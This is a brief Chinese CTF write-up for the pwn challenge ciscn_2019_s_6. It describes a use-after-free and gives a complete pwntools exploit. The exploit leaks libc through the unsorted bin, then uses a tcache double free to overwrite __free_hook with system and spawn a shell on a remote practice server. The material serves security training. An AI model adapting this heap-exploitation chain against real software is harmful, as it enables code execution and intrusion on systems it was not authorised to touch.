ciscn_2019_s_6：

保护全开

漏洞分析：

指针未清零，存在uaf

大致步骤：

利用unsortbin泄露libc，doublefree劫持free_hook为system

exp：

from pwn import *
local_file  = './ciscn_s_6'
local_libc  = './libc-2.27.so'
remote_libc = './libc-2.27.so'
select = 1
if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('node4.buuoj.cn',27542 )
    libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se      = lambda data               :r.send(data)
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims                         :r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
def debug(cmd=''):
     gdb.attach(r,cmd)
#---------------------
def add(size,name):
    sla('choice:','1')
    sla('Please input the size of compary\'s name\n',str(size))
    sa('please input name:\n',name)
    sa('please input compary call:\n','198')
def show(index):
    sla('choice:','2')
    sla('Please input the index:\n',str(index))
def delete(index):
    sla('choice:','3')
    sla('Please input the index:',str(index))
#---------------------
add(0x410,'aaaa')
add(0x30,'/bin/sh\x00')
delete(0)
show(0)
libc_base=uu64(ru('\x7f')[-6:])-96-0x10-libc.sym['__malloc_hook']
print 'libc_base='+str(hex(libc_base))
free_hook=libc_base+libc.sym['__free_hook']
system=libc_base+libc.sym['system']
#-------------------------
add(0x30,'aaaa')
delete(2)
delete(2)
add(0x30,p64(free_hook))
add(0x30,p64(0))
add(0x30,p64(system))
delete(1)
#debug()
r.interactive()